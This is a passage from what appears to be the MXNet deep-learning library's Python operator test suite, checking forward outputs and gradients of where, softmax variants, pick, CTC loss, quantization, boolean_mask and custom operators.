x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert(expect_out.all() == out.all())
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
@with_seed()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
@with_seed()
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
@with_seed()
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)])
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1.bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_seed()
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
import sys
is_windows = sys.platform.startswith('win')
enforce_safe_acc = os.environ.get("MXNET_SAFE_ACCUMULATION", "0")
if not is_windows or enforce_safe_acc == "1":
os.environ["MXNET_SAFE_ACCUMULATION"] = "1"
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
@with_seed()
def test_softmax_with_length():
def np_softmax_with_length(data, length):
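# Reference implementation: softmax with use_length normalizes only the first
# `length[i, j]` entries along the softmax axis (axis 1 here) and leaves the
# remaining positions at zero.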
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
@with_seed()
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
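# `exp` is a list of broadcastable index arrays, so data[exp] gathers one element per
# position along `axis` (with 'wrap' mode applying the modulo above).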
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTrain = exe.outputs[0].copy()
# test forward without grad calc
exe.forward(is_train=False)
outTest = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTrain, outTest)
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
@with_seed()
def test_ctc_loss():
# Test 1: check that both batch entries give the same loss and check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check that an integer type can be used as the label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
@with_seed()
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
@with_seed()
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # test data adapted from TensorFlow's CTC tests
vocab_size = 5
max_label_len = 5
padding_mask = -1 + (blank_label == 'first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
@with_seed()
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
@with_seed()
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
@with_seed()
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
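# Note: with grad_req='add' the gradients accumulate across the T backward passes, so
# each row's expected gradient is its mask count (bi + ci) repeated T times.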
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
@with_seed()
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
@with_seed()
def test_reciprocal_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 6 below set empirically, depends on eps.
# Issue exposed by seed 879579887.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 6*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
@with_seed()
def test_cbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid finite difference method inaccuracies due to infinite gradient at the origin.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 553872106.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=eps)
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
@with_seed()
def test_rcbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 788174893.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
@with_seed()
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of the default implementation of
# storage type inference in a custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@with_seed()
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork on Windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
@with_seed()
def test_custom_op_exc():
# test exception handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
